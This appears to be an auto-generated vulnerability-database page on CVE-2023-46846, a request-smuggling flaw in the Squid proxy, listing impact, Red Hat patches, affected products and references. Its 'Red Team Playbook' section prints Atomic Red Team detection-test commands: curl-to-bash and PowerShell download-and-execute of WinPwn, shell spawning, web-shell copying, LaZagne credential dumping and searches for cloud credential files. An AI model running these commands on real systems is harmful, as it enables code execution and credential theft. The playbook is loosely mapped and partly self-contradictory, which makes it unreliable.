CVE-2023-46846
Overview
This vulnerability is an HTTP request smuggling flaw resulting from lenient parsing in the chunked transfer encoding decoder within the SQUID proxy server. The root cause lies in the improper handling of chunked HTTP requests, allowing desynchronization between frontend security components and backend servers. The affected component is the HTTP chunked decoder logic in SQUID, which misinterprets the boundaries of HTTP requests when processing chunked payloads.
Vulnerability Description
SQUID is vulnerable to HTTP request smuggling, caused by chunked decoder lenience, allows a remote attacker to perform Request/Response smuggling past firewall and frontend security systems.
Impact
An unauthenticated remote attacker can exploit this vulnerability to smuggle HTTP requests and responses past firewall and frontend security systems, potentially allowing interception or manipulation of traffic. This can lead to unauthorized access to backend services, bypassing security controls without user interaction. The vulnerability has a high impact on confidentiality and partial impact on integrity, with no impact on availability, as reflected in the CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N.
Solution
Red Hat has issued multiple advisories (RHSA-2023:6266, RHSA-2023:6267, RHSA-2023:6268, RHSA-2023:6748, RHSA-2023:6801) providing patched versions of SQUID and related packages for affected Red Hat Enterprise Linux versions 8.0, 9.0, 8.6, and 8.8. Users should apply these updates promptly to mitigate the vulnerability. Detailed patch instructions and updates are available at Red Hat's official errata pages and the squid-cache GitHub security advisory GHSA-j83v-w3p4-5cqh.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the SQUID caching proxy server arises from its lenient handling of chunked transfer encoding in HTTP requests. This weakness allows an attacker to manipulate the way requests are processed, leading to HTTP request smuggling. In essence, the flaw occurs during the decoding of chunked requests, where the server may misinterpret the boundaries of the data being sent. This leniency can be exploited to craft malicious requests that bypass security measures, such as firewalls and frontend security systems, which are designed to inspect and filter incoming traffic. By exploiting this vulnerability, an attacker can smuggle requests that may be interpreted differently by the backend server, potentially leading to unauthorized access or data leakage.
Attack vectors for this vulnerability are diverse and can be executed through various means. An attacker could send specially crafted HTTP requests that exploit the decoding issue, allowing them to inject malicious payloads or commands into the communication stream. For example, an attacker might send a request that appears benign to the frontend security systems but is interpreted differently by the backend server. This could result in the execution of unauthorized actions, such as accessing sensitive data or executing commands that compromise the integrity of the server. Additionally, the ability to smuggle requests can be leveraged to conduct further attacks, such as cross-site scripting or session hijacking, amplifying the potential impact of the initial exploitation.
The real-world implications of this vulnerability are significant, particularly for organizations relying on the affected products for web traffic management and caching. The ability to bypass security mechanisms poses a substantial business risk, as it can lead to data breaches, unauthorized access to sensitive information, and potential regulatory non-compliance. Furthermore, the exploitation of this vulnerability could result in reputational damage, loss of customer trust, and financial repercussions stemming from remediation efforts and potential legal liabilities. Organizations that utilize the affected versions of SQUID or related Red Hat Enterprise Linux distributions must recognize the critical nature of this vulnerability and prioritize its remediation.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected software versions is essential to close the gap that allows for such exploitation. Additionally, employing web application firewalls (WAFs) that can analyze and filter HTTP requests for anomalies can help detect and block malicious traffic before it reaches the backend servers. Monitoring network traffic for unusual patterns or behaviors indicative of request smuggling attempts is also crucial. Organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and ensure that security measures are properly configured to defend against such attacks.
In conclusion, the vulnerability in SQUID related to HTTP request smuggling represents a serious threat to organizations that utilize this caching proxy server. The potential for exploitation through lenient request handling can lead to significant security breaches and operational disruptions. By understanding the technical details, attack vectors, and real-world impacts of this vulnerability, organizations can take proactive steps to detect and mitigate the associated risks, thereby safeguarding their systems and data from malicious actors.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Squid-Cache | Squid | All |
cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 8.0 |
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 9.0 |
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_eus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 8.8 |
cpe:2.3:o:redhat:enterprise_linux_eus:8.8:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 9.0 |
cpe:2.3:o:redhat:enterprise_linux_eus:9.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 9.2 |
cpe:2.3:o:redhat:enterprise_linux_eus:9.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux For Arm 64 | 8.0_aarch64 |
cpe:2.3:o:redhat:enterprise_linux_for_arm_64:8.0_aarch64:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux For Ibm Z Systems | 8.0_s390x |
cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0_s390x:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux For Power Little Endian | 8.0_ppc64le |
cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0_ppc64le:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 8.2 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Aus | 9.2 |
cpe:2.3:o:redhat:enterprise_linux_server_aus:9.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.2 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 8.8 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:8.8:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Server Tus | 9.2 |
cpe:2.3:o:redhat:enterprise_linux_server_tus:9.2:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-273 | HTTP Response Smuggling |
32%
|
Medium | High | |
| CAPEC-33 | HTTP Request Smuggling |
32%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (17)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-46846 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6266 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6267 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6268 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6748 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6801 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6803 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6804 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:6810 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2023:7213 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:11049 |
| access.redhat.com |
GitHub CVE
vdb-entry
x_refsource_REDHAT
|
https://access.redhat.com/security/cve/CVE-2023-46846 |
| bugzilla.redhat.com |
GitHub CVE
issue-tracking
x_refsource_REDHAT
|
https://bugzilla.redhat.com/show_bug.cgi?id=2245910 |
| github.com |
GitHub CVE
|
https://github.com/squid-cache/squid/security/advisories/GHSA-j83v-w3p4-5cqh |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2024/01/msg00003.html |
| lists.debian.org |
NVD API
|
https://lists.debian.org/debian-lts-announce/2024/01/msg00008.html |
| security.netapp.com |
NVD API
|
https://security.netapp.com/advisory/ntap-20231130-0002/ |